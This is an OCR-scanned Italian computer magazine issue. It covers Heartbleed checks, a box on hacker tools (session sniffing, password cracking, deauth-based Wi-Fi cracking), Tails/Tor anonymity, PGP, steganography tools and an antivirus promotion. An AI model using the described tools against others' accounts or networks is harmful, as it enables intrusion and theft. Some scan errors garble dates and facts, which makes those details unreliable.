ration, colpevoli di non aver supportato 
abbastanza il progetto OpenSSL, ai pirati 
informatici sempre a caccia di nuove vul¬ 
nerabilità in stile Heartbleed. Sicuramen¬ 
te, il retroscena più inquietante è quello 
sull’impegno profuso nella gestione e nella 
cura di OpenSSL: un componente di sicu¬ 
rezza essenziale per la parte di Internet 
più frequentata dagli utenti ma che è stato 
sin qui curato da appena due sviluppatori 
(uno solo impegnato a tempo pieno) che 
possono contare su donazioni annuali di 
appena 2.000 dollari! 

Fortunatamente il caso Heartbleed sem¬ 
bra avere insegnato qualcosa alle grandi 
aziende e ora accanto a Steve Marquess e 
Stephen Henson (i due sviluppatori di cui 
sopra) dovrebbero arrivare un bel po’ di for¬ 
ze fresche e OpenSSL dovrebbe giovarsi di 
finanziamenti sostanziosi gestiti da Linux 
Foundation con il contributo di colossi del 
calibro di Microsoft, Intel, Google, Face- 
book e Qualcomm. Nel frattempo, ricor¬ 
diamoci di cambiare tutte le password 
dei nostri account Web per impedire a 
qualche malintenzionato di trafugare i 
nostri dati personali. 


Verifichiamo la sicurezza dei siti 

Grazie ad un tool messo a punto da McAfee possiamo testare la sicurezza o meno di qualunque servizio Web 
di nostro interesse. Basterà indicarne l'indirizzo e ci verrà dato un responso in merito al bug Heartbleed. 



^ Andiamo sul sito 

Il primo passo consiste nel visitare il sito 
Web allestito da McAfee per controllare 
l’eventuale presenza della vulnerabilità Heartbleed. 
Apriamo il browser e digitiamo http://tif.mcafee. 
com/heartbleedtest: il sito si presenta con un'in¬ 
terfaccia minimale. 


Quale sito controllo? 

Nel campo Input URL or IP Address 
inseriamo l'indirizzo del sito Web che 
vogliamo controllare. Possiamo inserire l'URL 
di Facebook, di Google, di Gmail, insomma di 
qualunque servizio di cui volessimo sincerarci 
in quanto ad affidabilità. 


^ Siamo al sicuro! 

Scelto il sito Web da controllare, dobbia¬ 
mo semplicemente cliccare Scan. Pochi 
secondi di attesa e vedremo comparire il verdet¬ 
to: nel nostro caso, il responso risulta negativo, 
segno che il sito ha provveduto ad aggiornare la 
versione di OpenSSL usata! 


16 Win Magazine Speciali 
























Heartbleed | Per saperne di più 


A scuola di hacker^ 



LE REGOLE D'ORO 
PER DIFENDERSI 
DA HEARTBLEED 

A Controlliamo se i siti Web che visl- 
I tiamo più spesso sono vulnerabili 
testandoli su http://tif.mcafee.com/he- 
artbleedtest 

2 Evitiamo di collegarci ai siti che risul¬ 
tano vulnerabili. Aspettiamo quindi 
che il sito aggiorni la versione di OpenS- 
SL e poi cambiamo immediatamente la 

password 

3 Anche se un sito risulta non vulnera¬ 
bile, è opportuno cambiare immedia¬ 
tamente la password 

4 Non usiamo mai la stessa password 
per siti differenti 

5 Diffidiamo delle e-mail che cl invitano 
a cliccare su un link per aggiornare le 
nostre password: si tratta di attacchi di 
tipo phishing 

6 Per collegarsi ad un sito conviene 
sempre digitare a mano l’indirizzo e 
mai cliccare sui link che reindirizzano alla 
home page, in quanto potrebbero essere 
stati alterati 

7 Se gestiamo un server Web che ospita 
un nostro sito o usiamo un NAS, ag¬ 
giorniamoli appena possibile 


,5cVc V 


HEARTBLEED: TUTTO QUELLO 
CHE C'È DA SAPERE! 




y=\twu 






Il bug è stato introdotto in OpenS- 
SL I.O.lf, versione rilasciata nel di¬ 
cembre del 2011, e reso pubblico 

10 scorso 7 aprile. È stato corretto 

11 14 marzo 2014 con il rilascio di 
OpenSSL 1.0.1 g. 

Sfruttando il bug del protocollo 
OpenSSL, i pirati informatici ri¬ 
escono a rubare dati trasmessi 
su Internet mediante connes¬ 
sioni di tipo SSL/TLS utilizzate 
da diverse applicazioni tra le 
quali: 

• Browser 

• Client e-mail 

• Instant messagging 

• Reti private VPN 

La vulnerabilità consente ai pirati 
di accedere ai server Web ed entra¬ 
re in possesso di: 

• Password di accesso 
ai servizi on-line 

• Numeri carte di credito 
•Dati personali e sensìbili 

Dalle prime analisi, Heartbleed ha 
finora messo a rischio il 66% dei siti 


Web protetti mediante protocollo 
HTTPS: stiamo parlando di circa 
500.000 siti vulnerabili! 

Tra i siti e I servizi a rischio, per i 
quali è opportuno cambiare la 
password, ci sono: 

Facebook • Pinterest • Tumblr • 
Twitter • Google • Apple • Yahoo • 
Gmail «Yahoo Mail • eBay 

Sono invece immuni ad Heartble¬ 
ed i seguenti siti e servizi: 

Linkedln • Microsoft • Hotmail/Out¬ 
look • Amazon • PayPal 

Spetta ai responsabili della sicu¬ 
rezza dei singoli siti aggiornare il 
modulo OpenSSL alla nuova ver¬ 
sione. Non bisogna installare alcun 
aggiornamento di sicurezza su PC, 
tablet e telefonini, ma chi ha un 
computer che ospita un sito Web 
oppure un NAS dovrà verificare se 
sta usando la versione vulnerabile 
di OpenSSL. 

Tutti I sistemi operativi Mac OS, Li¬ 
nux, Windows, Android e iOS sono 
vulnerabili a Heartbleed 


PI RATE CD: GLI STRUMENTI SEGRETI USATI DAGLI HACKER 



FACENIFF 

Un'app Android 
che permette ad un 
malintenzionato di 
porta re a termine 
un attacco Man In 
The Middle (MITM): 
in pratica, riesce ad 
inserirsi tra l'utente 
e il router in modo 
da "sniffare” la 
sessione aperta di 
Facebook, Twitter e 
Tumblr. 


Spia via Web qualsiasi PC 

"Colleziona" password, 
numeri di carta di credito&Co. 

Clona le identità 


I principali tool (li trovi sul DVD-Rom) preferiti dai malintenzionati per spiare via Web qualsiasi 
PC, collezionare password e numeri di carte di credito, clonare le identità altrui. 

Attenzione: usali solo sul tuo computer o su quello di un tuo amico. 


CAIN&ABEL 

Permette di 
recuperare molti 
tipi di password 
sniffando la rete 
locale, usando 
tecniche di attacco 
basati su dizionari 
odi tipo brute 
force. In questo 
modo un eventuale 
malintenzionato riesce 
a recuperare le chiavi 
di acceso a siti e servizi 
Web di ogni genere. 


WIRESHARK 

Uno degli strumenti di 
analisi di rete gratuito 
più famosi al monda 
Usando questo 
programma il pirata 
riesce a filtrare, 
catturare e spiare 
i pacchetti e le 
informazioni che 
passano all'Interno 
di una rete di 
computer, spiando 
le comunicazioni via 
e-mail e chat. 


Applicazione per 
dispositivi Android che 
consente di “testare" la 
sicurezza della nostra 
rete Wi-Fi. Nel suo 
vasto database ha 
una lista di tutte le 
chiavi WPA e WEP 
predefinite di vari 
modelli di router 
appartenenti a circa 
40 case produttrici 
e fomiti in comodato 
d'uso da provider 
come Alice, Fastweb, 
Vodafone e Infostrada. 


Funziona solo su 
dispositivi Android 
rootati. Per bucare 
le password WPA o 
WPA2 l'app effettua un 
attacco di tipoDeauth 
che farà disconnettere 
e riconnettere il 
dient vittima. In 
questo modo il pirata 
potrà sniffare la 
riautenticazione 
ed effettuare 
un attacco per 
identificare la 
password del Wi-Fi. 


WPA TESTER 


AIRCRACKGUI 
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Così blindi il 
tuo computer 

Grazie al Crypto disk navighi anonimo, comunichi al 
riparo da occhi indiscreti e scarichi senza lasciare tracce 


■ eggendo l’articolo delle pagine pre¬ 
gi cedenti abbiamo scoperto quanto 
kè facile mettere a rischio la nostra 
privacy ogni volta che col browser ci 
colleghiamo a Internet. Pirati infor¬ 
matici e malintenzionati sono sempre 
pronti a rubare i nostri dati personali e 
diventa quindi fondamentale adottare 
tutte le misure di sicurezza necessarie 
per metterli al riparo da ogni possibile 
attacco. Tenere sempre gli occhi aperti 
per non cadere nelle tante trappole 
disseminate per il Web è importante, 
ma senza gli strumenti software giusti 
tutta la nostra attenzione potrebbe 
non bastare! 


Anonimi è bello 

Il modo migliore per navigare su In¬ 
ternet come veri fantasmi e comuni¬ 
care con chiunque al riparo da occhi 
indiscreti è quello di usare un siste¬ 
ma operativo anonimo come Tails 
(che abbiamo ribattezzato “Cryto 
disk"). Si tratta di una distribuzione 
Linux avviabile direttamente anche 
da chiavetta USB che, grazie a po¬ 
tenti strumenti integrati, permette 
di nascondere l’identità di chi la usa. 
Inoltre, il sistema operativo non inte¬ 
ragisce in alcun modo con il software 
installato nel PC su cui viene avviato e, 
soprattutto, non usa il suo hard disk: 


l’unico spazio di archiviazione usato 
da Tails è la memoria RAM che, come 
sappiamo, si cancella completamente 
quando il sistema viene spento. Ciò si¬ 
gnifica che non solo non si lascia trac¬ 
cia di Tails, qualsiasi sia il computer 
sul quale viene usato, ma nemmeno 
di quello che si è fatto. Nelle prossi¬ 
me pagine scopriremo dunque come 
utilizzare al meglio questo potente 
strumento per blindare il nostro com¬ 
puter e navigare anonimi, scaricare 
da Internet senza lasciare traccia e 
comunicare al riparo da occhi indi¬ 
screti. In poche parole, diventeremo 
dei veri fantasmi del Web! 


Cosa ci 
occorre 401 

SISTEMA OPERATIVO 
ANONIMO 

TAILS 

Lo trovi su: •'DVD 

K'iii ffl mMi'» 

Sito Internet 

https://talls.boum.org 



ECCOLA 
PASSWORD 
DI ACCESSO 

Ogni volta die avviamo 
Tails, veniamo accolti 
da una finestra che a 
offre la possibilità di 
accedere direttamente 
al sistema operativo, 
dkcando Login, oppure 
aprire le opzioni avan¬ 
zate (More options). Se, 
ad esempio, prevedia¬ 
mo di usare la password 
di amministratore, 
dkdiiamo Yes, poi for¬ 
marli t impostiamo la 
chiave di accesso. 


3 Prepariamo il nostro Cryto disk 

Il modo migliore di usare Tails è quello di “installarlo” su una pendrive USB: in questo modo potremo 
usarlo davvero ovunque e in tutta sicurezza. Bastano pochi clic e saremo subito operativi! 



Ecco tutto roccorrente 


Prepariamo la pendrive 


[ Colleghiamo al computer una chiavetta USB 
con almeno 4 GB di spazio. Dal WinDVD- 
Rom avviamo UNetbootin , che non necessita di instal¬ 
lazione essendo un software portable. Nel frattempo 
scarichiamo sempre dal Win DVD-Rom la ISO di Tails 
e salviamola in una cartella a piacere nel nostro PC. 


2 Dall’interfaccia di UNetbootin selezio¬ 
niamo Immagine disco e, cuccando sul 
pulsante con i tre puntini sospensivi, scegliamo 
l'immagine ISO di Tails dalla cartella nella quale 
l'abbiamo salvata. Dal menu Unità scegliamo la 
chiavetta USB e clicchiamo OK per avviare il pro¬ 
cesso di copia. 



▲i Riavviamo e siamo ancnimi! 

Non ci resta che attendere pazienti la 
fine del processo: il tempo totale dipen¬ 
derà dalle prestazioni della chiavetta che abbia¬ 
mo destinato all'uso con Tails. Al termine, riav¬ 
viamo il PC e dal BIOS (accessibile cliccando 
Cane all’avvio del PC) il boot del sistema da 
dispositivo USB. 
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3 Navigare 100% anonimi sul Web 

Grazie a Tails possiamo navigare su tutti i siti Internet senza lasciare tracce, dribblando anche i filtri dei 
provider e di Google. Ecco come fare usando lo strumento IceWeasel contenuto nel Cryto disk. 



^ Siamo subito online 

| Per ottenere l’anonimato sul web, Tails 
utilizza Tor. Però è già tutto pronto per 
l’uso: quando carichiamo II sistema operativo, 
basta aspettare qualche secondo perché appaia 
il classico logo della cipolla nella barra delle ico¬ 
ne in alto a destra nello schermo. 


^ La donnola di ghiaccio 

2 ! Naturalmente, per navigare sul Web è 
necessario un browser che possa entrare 
nella rete Tor. Il browser predisposto per l’uso con 
la rete anonima è IceWeasel, una versione parti¬ 
colare di FireFox. Lo troviamo nel menu Applica- 
tions/lntemet/lceweasel Web Browser. 


^ Con i oluain giusti 

3 Ice Weasel ha una interfaccia sparta¬ 
na, ma contiene già I plu-gin necessari 
a garantire la massima sicurezza possibile, per 
esempio HTTPS everywhere, che tenta di stabi¬ 
lire una connessione cifrata con il server quan¬ 
do è possibile. 




^ Il mio indirizzo IP? 

4 Tra i plugin disponibili non è presen¬ 
te Flash Player perché potrebbe essere 
sfruttato da malintenzionati per scoprire il nostro 
vero indirizzo IP. Possiamo scoprire quale sia l’in¬ 
dirizzo che ci viene assegnato da Tor andando sul 
sito www.whatlsmyip.com. 


^ Il motore di ricerca 

g I Fare tanta attenzione a mantenere l'anoni¬ 
mato e poi rivolgersi a Google come motore 
di ricerca, potrebbe non essere la scelta più intelli¬ 
gente. Per questo motivo il motore di ricerca prede¬ 
finito in Tails è startpage.com, che non memorizza 
alcuna informazione e non filtra i risultati. 


^ Ricerche libere 

g Grazie a Start Page otteniamo i risultati 
che normalmente ci fornisce Google, ma 
con tutto l'anonimato che vogliamo e senza i filtri 
che polizia postale e provider pongono normal¬ 
mente. Inoltre, se vogliamo esplorare II web “proi¬ 
bito" possiamo usare II sito TorSearch. 



-x Acquisti sicuri 

Tails è certamente la soluzione migliore 
se si vogliono eseguire acquisti online in 
tutta sicurezza o gestire il conto corrente della 
propria banca: i soliti virus o trojan di Windows 
non possono, infatti, funzionare su Tails ed è dif¬ 
ficile che qualcuno rubi le nostre password. 



^ Senza anonimato 

g Naturalmente non siamo obbligati ad uti¬ 
lizzare la rete Tor: possiamo anche usare 
un browser non anonimo. Infatti, se dal menu di 
sistema Applications/lnternet scegliamo il pro¬ 
gramma Unsafe Web Browser, appariremo con 
il nostro vero indirizzo IP. 



I pregi della “insicurezza” 

In realtà, il browser "insicuro" può aiu¬ 
tarci a garantire l'anonimato. Se, infatti, 
usiamo il browser anonimo per accedere a servizi 
tracciabili (per esempio Gmail o Outlook), rischia¬ 
mo di svelare la nostra identità. Per questi siti, 
conviene usare il browser Unsafe. 
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a E-mail a prova d’intruso 

Abbiamo il timore che qualcuno possa leggere i nostri messaggi di posta elettronica? Non più, se vengono 
crittografate usando gli strumenti integrati in Tails. Ecco come comunicare al riparo da occhi indiscreti. 



^ Il modo tradizionale” 

■j II metodo più tradizionale per gestire le 
proprie e-mail è utilizzare un programma 
Client (per esempio Outlook o Thunderbird). Su 
Tails è invece presente il programma Claws, che 
si trova nel menu di sistema alla voce Applica- 
tion/Internet/Claws. 



^ Un metodo diverso 

4 Possiamo inviare la nostra chiave pubbli¬ 
ca ad un amico e farci spedire da lui dei 
messaggi segreti. Però, su una distribuzione live, 
questo metodo è piuttosto scomodo e poco sicu¬ 
ro. Molto meglio usare un indirizzo e-mail tempo¬ 
raneo, come quelli offerti dal sito getairmail.com. 




^ Una breve configurazione 

2 Avviando il programma, dobbiamo natu¬ 
ralmente configurarlo indicando il nostro 
indirizzo e-mail e i server della posta in entrata e 
in uscita. Poi possiamo comporre e leggere mes¬ 
saggi come nostro solito. Possiamo anche cifrare 
e decifrare i messaggi con PGP. 



^ L’indirizzo temporaneo 

g Cliccando sul pulsante Get Tempora- 
ry Email, ci viene presentato un indiriz¬ 
zo temporaneo, del tipottht@evopo.com Que¬ 
sto indirizzo esisterà solo finché terremo aperto 
Il browser Web, ma è una casella e-mall in piena 
regola e può ricevere messaggi da altri utenti. 




Chiave pubblica o privata? 

PGP si basa su un sistema a doppia chia¬ 
ve: ce n'è una pubblica e una privata. 
Quella pubblica può essere consegnata a chiun¬ 
que e serve a cifrare i messaggi. Quella privata, 
invece, deve restare nota esclusivamente a noi, 
e serve per leggere i messaggi. 



^ Il portachiavi 

0 Possiamo gestire le chiavi PGP anche 
grazie all’apposito applet, che si trova a 
destra dell’icona di Tor (nella barra posta nella 
parte alta dello schermo). Cliccando su di esso 
si aprirà un menu, dal quale sceglieremo la voce 
Manage Keys. 



.x Due nuove chiavi 

7 Possiamo facilmente creare una nuova 
coppia di chiavi PGP: quando lo facciamo 
dobbiamo specificare che devono essere asso¬ 
ciate all’indirizzo e-mail temporaneo che abbia¬ 
mo ottenuto da getairmail.com. Poi, possiamo 
inviare la chiave pubblica ai nostri amici. 


Una vera collezione 

g Naturalmente se vogliamo fare il contrario, 
cioè inviare noi stessi un messaggio cifrato 
ad un amico, avremo bisogno di conoscere la sua 
chiave pubblica. Appena sarà comunicata, la inseri¬ 
remo nella scheda Other keys. Per cifrare un testo 
con PGP basta aprire l'editor Accessories/Gedit. 


^ Un testo semplice 

0 Scriviamo il messaggio che vogliamo crip- 
~ tare, lo selezioniamo e lo copiamo negli 
appunti ( Edit/Copy ). A questo punto scegliamo 
l’opzione Encrypt with Public Keys dall’applet 
PGP, selezioniamo la chiave di cifratura e incollia¬ 
mo in Gedit il testo cifrato ( Edit/Pastd). 
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il Download anonimi dei film 


Molti servizi di file sharing non si possono usare dalla rete tor... Ma noi sappiamo come prelevare i video che 
ci interessano... Vimeo, YouTube, Facebook non hanno scampo! 



.x Un servizio on-line 

•\ Scaricare file con Tor non è facile: la mag¬ 
gior parte del servizi (come Rapidshare) 
blocca automaticamente i download da rete Tor. La 
soluzione migliore consiste nello scaricare filma¬ 
ti e musica da siti come Vimeo, Youtube, e simili, 
usando il sito savevideo.me. 


Conia e incolla 

2 Infatti, è impossibile scaricare anche tor- 
rent attraverso la rete Tor. Grazie a savevi- 
deo.me, invece, basta inserire il link del filmato che 
vogliamo e premere Download. Poi cucchiamo col 
tasto destro del mouse sul primo link che appare e 
scegliamo Copy Link Location. 


^ Come i professionisti 

3 Apriamo una console, dal menù di siste¬ 
ma Appiications/Accessories/Terminal. 
Qui dobbiamo scrivere II comando wget seguito 
da uno spazio. Wget, infatti, significa Web Get, cioè 
"scarica dal web", ed è una applicazione che con¬ 
sente il download di file o interi siti web. 



Ecco il link 

4 Clicchiamo con il tasto destro del mouse 
sul terminale e scegliamo l’opzione Paste 
per incollare, subito dopo a wget, il link del video 
da scaricare. A questo punto basta premere il tasto 
Invio, ed il download comincerà, utilizzando la rete 
anonima Tor. 



^ Più download insieme 

5 II bello di questo metodo sta nel fatto che 
possiamo eseguire più download con¬ 
temporaneamente: basta cliccare sul menù File/ 
Open Tab per ottenere una nuova scheda. In que¬ 
sta potremo ripetere il comando wget con il link di 
un altro file da scaricare. 



Download ultimato 

0 Appena un download termina, appare nuo¬ 
vamente il prompt (la scritta verde amne- 
sia@amnesid). Possiamo quindi avviare un altro 
download nella stessa scheda, ma possiamo 
anche andare a vedere II risultato del trasferimen¬ 
to che si è appena concluso. 



^ Eccolo qui, finalmente 

7 Cuccando sul menu di sistema Applica¬ 
tions/System Tools/File Manager ottenia¬ 
mo una sorta di “esplora risorse”. Questo dovrebbe 
aprirsi automaticamente nella home, cioè la cartel¬ 
la in cui sono stati scaricati i file video che abbiamo 
prelevato con wget. 


^ Un rapido cambio nome 

g I II file scaricato avrà di certo un nome piut¬ 
tosto strano: molto meglio rinominarlo, clic- 
candovi sopra con il tasto destro del mouse e sce¬ 
gliendo la voce Renarne. Possiamo dargli un nome 
qualsiasi, ma è meglio mantenere l’estensione ori¬ 
ginale (,mp4). 


^ Anteprima e conia 

0 Proviamo a vedere, finalmente, il video 
scaricato: su Tails, infatti, è preinstallato 
un player multimediale. Poi, però, ricordiamoci di 
copiare il file in una pendrive o una scheda SD, 
altrimenti verrà automaticamente cancellato quan¬ 
do spegneremo il computer. 
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9 Quattro chiacchiere anonime 

E-mail anonime e navigazione sicura su siti Web non bastano no bastano a garantire la nostra privacy: ecco quindi 
come chiacchierare con i nostri amici e in tempo reale in totale anonimato. 


Abilitato Nome utente Protocollo 

□ Chew@irc.indymedia.org [fp IRC 

0 Chew@irc.oftc.net ^ IRC 

□ Chew@127,0,0.1 [5 IRC 

Chew@chat.wikileaks.de IRC 


Account 


£5l Aggiungi un account 



Di base Avanzate Proxy 

Opzioni di login 

Protocollo: Google Talk 

Nome utente: mysecret 

Dominio: gmail.com 


Usiamo un account esistente... 

Awiamo Pidgln e In Account troviamo I server IRC In cui libertà di 
parola e anonimato sono importanti, come indymedia e wikileaks. 
Per accedervi premiamo su Abilitato, altrimenti creiamo un nuovo account 
premendo suH’omonimo tasto. 


^ ... oppure creiamone uno nuovo 

2 Per creare l'account indichiamo il messenger da utilizzare e I dati di 
accesso. Non tutti i protocolli saranno disponibili, Windows Live Mes¬ 
senger non è stato incluso nella lista perché è considerato poco sicuro per il 
proprio anonimato. 


& 


Aggiungi un account 


Di base Avanzate Proxy 
0 Bichiedi SSL/TLS 


□ Forza il vecchio SSL (porta 5223) 

Consenti l'autenticazione come testo semplice 
L su stream non criptati 

Porta per la connessione: |5222 


r 


#tails 


Conversazione Opzioni 


Q weber.oftc.net 



- 1 

#tails 

® Welcome to #tails, thè discussion chan 


End private cc 
Autenticate I 


(01:59:23) L'argomento di #tails è: U weber.oftc.net 
#tails, thè discussion channel for £ Not Private 
and developers. | Current: 0.8.1 | 
https://tails.boum.org/ I® What's this? 


^ Occhio alla sicurezza 

3 Selezioniamo SSL/TLS per la connessione e obblighiamo il pro¬ 
gramma a non utilizzare mai comunicazioni in chiaro. Nel caso di 
server Jabber e Gtalk, Tails imposterà un proxy di “fiducia” per il trasfe¬ 
rimento dei file. 


Attiviamo il olua-in OTR 

4 è possibile stabilire una comunicazione totalmente criptata con un 
interlocutore utilizzando il plug-in OTR di Pidgin, attivabile dal menu 
nella finestra di conversazione con l'Interlocutore. Nessuno potrà mai scopri¬ 
re la conversazione! 


CONFIGURIAMO LA RETE TOR 


Se le impostazioni predefinite di Tor 
non ci soddisfano, possiamo sempre 
configurarlo su misura dal suo pan¬ 
nello di controllo. Durante la fase di 
gestione possiamo vedere lo stato 
di connessione alla rete, i log di fun¬ 
zionamento, misurare il consumo di 
banda e cambiare la propria identità. 
Questa funzionalità è utile per cam¬ 
biare stato o per cercare un circuito 
più veloce per la navigazione. Nella 
mappa possiamo controllare i circuiti 
attivi e la nazione in cui è il nodo di 
uscita. Possiamo chiudere i circuiti lenti 
o che attraversano stati che non ci ag¬ 


gradano premendo il tasto destro del 
mouse sulle voci nella sezione sotto 
la mappa. Se il collegamento alla rete 
Tor fallisce, andiamo in Impostazioni/ 
Retee proviamo ad abilitare una o più 
voci. Cosi il software tenterà tecniche 
più aggressive per camuffare i collega- 
mentiTor, sfruttando anche eventuali 
proxy HTTP aziendali. Un nodo Tor 
può diventare a sua volta un nodo di 
transito e/o di uscita. Se la LAN è sicura, 
abilitiamo la condivisione nella relativa 
sezione. In Exitpolicy possiamo anche 
indicare quali protocolli anonimi vo¬ 
gliamo supportare. 
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Crypto 


n 

D r 


disk 


Naviga in perfetto anonimato 

Nascondi i tuoi dati nelle 
foto e nei file MP3 

Usa le chat al riparo 
da occhi indiscreti 

Scarica senza lasciare tracce 


CRYPTO DISK: GLI STRUMENTI GIUSTI PER BLINDARE IL NOSTRO COMPUTER 


Nei laboratori di Win Magazine abbiamo messo a punto un kit software per Windows e Linux che permette di rendersi invisibili in Rete: oltre 
al sistema operativo Tails, analizzato nelle pagine precedenti, troviamo tanti tool per nascondere dati personali aH'intemo di altri file. 



LI 



Un piccolo programma 
stand-alone (non richiede 
installazione) che permette di 
nascondere un file aH'intemo 
di una foto in formato JPG. 

Una volta caricato il file, basta 
impostare una password o 
usare quella di default del 
programma perfaraprire il file 
al destinatario oppure cambiare 
la password e limitare la visione 
solo ad utenti autorizzati. 


Questo piccolissimo 
programma gratuito ci 
consente di “camuffare" 
i nostri file all'Interno di 
immagini in formato BMPo 
GIF utilizzando una password. 
All'apparenza le immagini 
sembrano normali foto che 
possono essere visualizzate 
con qualsiasi programma di 
grafica. In realtà inserendo la 
password e utilizzando lo stesso 
programma, sarà possibile 
scaricare i file nascosti. 


WbStego è un programma 
gratuito che consente di 
nascondere qualsiasi tipo di 
file alllntemo di documenti 
PDF, HTML e BMP. Tutti i dati 
saranno "invisibili"ad un utente 
comune e, quindi, al sicuro 
da occhi indiscreti. WbStego4 
fornisce due tipi di interfacce 
utente: una modalità Wizard 
che guida l'utente passo¬ 
passo attraverso la codifica 
e la decodifica e la modalità 
Diagramma di flusso per utenti 
avanzati. 


Permette di nascondere dati 
personali all'interno dei file 
MP3. Le informazioni vengono 
nascoste durante il processo di 
compressione. I dati vengono 
prima compressi, cifrati e 
infine nascosti nel flusso di 
bitdelfileMP3. Inizialmente 
scritto per applicazioni di 
steganografìa, si è rilevato 
un ottimo come sistema di 
marcatura per file MP3. Ogni 
utente può decomprimere un 
proprio file con il flusso di bit e 
ricomprimedo per eliminare le 
informazioni nascoste. 


È un programma per 
nascondere un file o un 
documento alllntemo di 
un'immagine o in un file MP3. 

11 fu nzionamen to è molto 
semplice: basta selezionare 
dal menu input il file di origine, 
selezionare il file dentro il quale 
nascondere il file e selezionare 
quello di uscita (output). 
Cliccando EXECUTE verrà creato 
un file unico con all'Interno il file 
da nascondere. Questa utility è 
particolarmente indicata per 
file compressi in formato ZIP 
ORAR 



Our Secret è un programma 
di crittografo, che consente 
di nascondere i file in 
un'immagine e aggiungere 
una password per protegge 
i dati nascosti. Volendo, 
è anche possibile inserire 
anche messaggi di testo 
nell'immagine. Il formato 
immagine in cui è possibile 
nascondere il file deve essere 
Jpeg. 


Progettato per nascondere 
velocemente un archivio ZIP 
aH'intemo di un'immagine in 
formato JPG. L'operazione di 
crittazione è semplice: basta 
creare un archivio ZIP con tutti i 
file da nascondere, rinominarlo 
"Hiddenzip"e spostarlo sul 
desktop. Poi, si sceglie la foto 
in cui nascondere l'archivio, 
rinominandola "lmage.jpg"e 
spostarla sul desktop. Non resta 
che lanciare il file ZIP'n'JPG.bat e 
seguire a schermo la procedura. 


Permette di creare file 
che contengono altri file 
nascosti al loro interno. La 
sua particolarità è che 
consente di utilizzare diversi 
file multimediali in cui 
“nascondere” gli altri file: Avi, 
Jpg, Mp3, Mp4, Pdf e anche 
Png. Il programma offre diverse 
metodologie di camuffamento 
a seconda di quanti file 
dobbiamo nascondere. 
Naturalmente è necessario 
usare lo stesso programma per 
"estrarre"i dati protetti. 


Uo software di 
mascheramento file 
progettato per mantenere 
i file personali alla larga da 
sguardi indiscreti. Permette 
di nascondere file alllntemo 
di altri file. Dovremo dapprima 
selezionare il file "contenitore” 
immagine, selezionare il 
file (dati) da nascondere e 
cliccare su Proceed. In questo 
modo, in pochi istanti, i dati 
saranno nascosti e protetti 
nell'immagine che avevate 
selezionato. 


Sistema operativo live che fa 
della sicurezza e della privacy 
il suo punto di forza. Si può 
avviare da qualsiasi computer 
attraverso un DVD o una 
pennetta USB : a quel punto 
tutto il traffico web viene 
veicolato automaticamente 
attraverso il networkTor, 
che garantisce l'anonimato 
delle comunicazioni e della 
navigazione.Si possono anche 
salvare dati e documenti in 
modo optato. 
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rus 2015 
is per te! 


Ti regaliamo la miglior suite di 
sicurezza e la guida pratica per 
proteggere al meglio il tuo PC 


Cosa ci f 
occorre 

SOFTWARE ANTIVIRALE 

GUATA 
INTERNET 
SECURITY 2015 


Lo trovi su: 

Sito Internet 

www.gdata.it 


✓DVD 


RIMUOVI 
IL VECCHIO 
ANTMRUS 

Prima di procedere con 
l'installazione di G Data 
lnternetSecurity2015 
è opportuno rimuovere 
tutti i software antivi¬ 
rali presenti nel PC. Pos¬ 
siamo direttamente con 
Windows da Pannello 
di controlla/Disinstalla 
un programma. In 
alternativa, possiamo 
utilizzare i tool di rimo¬ 
zione specifici per ogni 
antivirus che troviamo 
nella sezione Spedali 
del Win DVD Rom. Al 
termine della disinstal¬ 
lazione è sempre buona 
norma ripulire il regi¬ 
stro di coniigurazione 
di Windows con un pro¬ 
gramma come CCleaner 
(sezione Indispensabili 
del Win DVD-Rom), cuc¬ 
cando su Registra/Trova 
Problemi e poi su Ripa¬ 
ra selezionati. 


P assano gli anni, i computer diventano 
a mano a mano più potenti e sofistica¬ 
ti, ma il pericolo virus è sempre dietro 
l’angolo. Avere un sistema operativo sempre 
aggiornato con le ultime patch rilasciate, fare 
attenzione a non aprire allegati ricevuti con 
le e-mail, non eseguire mai file .exe di cui 
non conosciamo l’autore e la provenienza 
sono sicuramente precauzioni che possono 
aiutarci ad evitare disastrose infezioni. Il pro¬ 
blema è però che le trappole e le possibilità 
di beccare un virus o un trojan navigando su 
Internet sono tante e tali che basta poco per 
divenire vittima di un malware. In caso di 
infezione, lo sappiamo bene, le conseguenze 
possono essere le più diverse, dal "semplice’’ 
blocco del PC aH’impossibilità di connettersi 
ad Internet, se non addirittura la corruzione 
e la cancellazione definitiva di documenti 
importanti e file di sistema o il furto di dati 
sensibili come informazioni di accesso ban¬ 
cari e numeri di carte di credito, con tutte le 
conseguenze del caso. 

Protezione massima per il PC 

Senza un buon programma antivirus il nostro 
computer è pertanto esposto a ogni genere di 
minaccia esterna. Per questo motivo noi di 
Win Magazine abbiamo deciso di regalare ai 
nostri lettori la suite G Data InternetSecurity 
2015, gratuita per 180 giorni, utile per blindare 
il PC e renderlo praticamente invulnerabile 
ad ogni attacco di virus e hacker. Utilizzando 
questo programma potremo infatti analizzare 
i messaggi di posta elettronica alla ricerca di 
allegati dannosi e link di phishing, bloccare 
automaticamente tutte le e-mail di spam, 
attivare un potente firewall che renda inacces¬ 
sibile ogni accesso non autorizzato al nostro 
computer ed eseguire un efficace controllo 
parentale per proteggere i bambini dai siti 
Internet pericolosi. Vediamo subito come fare. 
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G DATA: LA MIGLIOR DIFESA POSSIBILE DA VIRUS E MALWARE 


Per scegliere l'antivi- 
rusin grado di offrire 
la protezione miglio¬ 
re al nostro compu¬ 
ter e ai dati in esso 
archiviati abbiamo 
messo sotto torchio, 
nei nostri laborato¬ 
ri, le migliori suite di 
sicurezza disponi¬ 
bili sul mercato, sia 
quelle commerciali 
sia quelle gratuite. 
I risultati sono stati 
molto interessanti, 
ma alla fine la vinci¬ 
trice come miglior rapporto qualità/prezzo è stata 
proprio la suite G Data InternetSecurity 2015. L'effi¬ 
ciente protezione antivirus consente di assegnare 
un 10 e lode al programma di G Data, che non lascia 
scampo neppure ai virus più insoliti. Nessun altro 
programma ha bloccato in modo così veloce le nuove 
minacce. Nel corso del test la suite ha riconosciuto 
immediatamente la maggior parte dei virus scono¬ 
sciuti o solo dopo alcune ore dalla loro comparsa. Il 
programma è in grado di offrire queste straordinarie 
prestazioni grazie all'impiego di due scanner per virus 
che interagiscono perfettamente tra loro. 
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• Rischio di infezione con prevalenza di virus attuali 

(10.231 campioni)_0% 

• Rischio di infezione con virus 

finora sconosciuti... 20,00% 

• Percentuale di riconoscimento di virus datati 

(283.987 campioni)_99,51 % 

• Protezione da siti Web infetti, download, e-mail e 

pendrive USB _98,15% 

• Percentuale di riconoscimento...99,73% 

• Falsi allarmi attivi con programmi /falsi allarmi per 

